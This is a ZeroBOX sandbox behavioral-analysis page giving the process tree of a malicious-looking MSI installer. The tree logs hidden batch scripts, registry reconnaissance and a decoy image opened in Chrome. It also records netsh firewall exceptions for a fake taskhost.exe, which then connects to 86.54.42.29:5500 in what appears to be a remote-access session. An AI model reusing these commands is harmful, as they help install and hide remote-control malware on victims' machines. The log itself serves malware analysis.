| ZeroBOX

msiexec.exe "C:\Windows\System32\msiexec.exe" /I C:\Users\test22\AppData\Local\Temp\Software-MSI.msi
2592
explorer.exe C:\Windows\Explorer.EXE
1452
- viewer.exe "C:\Games\viewer.exe" /HideWindow "C:\Games\cmmc.cmd"
  2916
- cmd.exe cmd /c ""C:\Games\cmmc.cmd" "
  3016
  - cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
    2072
  - cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
    2116
    - reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
      152
  - WMIC.exe wmic process where (name="taskhost.exe") get commandline
    2228
  - findstr.exe findstr /i "taskhost.exe"
    2260
  - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://us1.discourse-cdn.com/flex019/uploads/manager1/original/2X/4/40a86b146f0d5eca2a51907256327ed2524cdf02.png
    2612
    - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef425f1e8,0x7fef425f1f8,0x7fef425f208
      2900
    - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2604 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
      284
  - viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\c.cmd
    2776
  - timeout.exe timeout /t 1
    2876
  - taskkill.exe taskkill /im rundll32.exe /f
    2244
  - timeout.exe timeout /t 2
    2944
  - taskkill.exe taskkill /im rundll32.exe /f
    300
  - timeout.exe timeout /t 2
    1852
  - taskkill.exe taskkill /im rundll32.exe /f
    2792
  - timeout.exe timeout /t 2
    1864
- cmd.exe cmd /c ""C:\Games\c.cmd" "
  2380
  - mode.com Mode 90,20
    2084
  - cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
    2212
  - cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
    1528
    - reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
      2396
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\cmd.txt"
    2184
  - cmd.exe cmd
    2288
    - mode.com Mode 90,20
      2848
    - netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL
      3028
    - netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL
      2392
    - WMIC.exe wmic process where (name="taskhost.exe") get commandline
      2756
    - findstr.exe findstr /i "taskhost.exe"
      2400
    - taskhost.exe C:\Games\taskhost.exe -autoreconnect ID:5533368 -connect 86.54.42.29:5500 -run
      2236
  - viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\once.cmd
    2268
  - timeout.exe timeout /t 20
    604
  - timeout.exe timeout /t 20
    3764
  - timeout.exe timeout /t 20
    3468
  - timeout.exe timeout /t 20
    3676
- cmd.exe cmd /c ""C:\Games\once.cmd" "
  1976

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents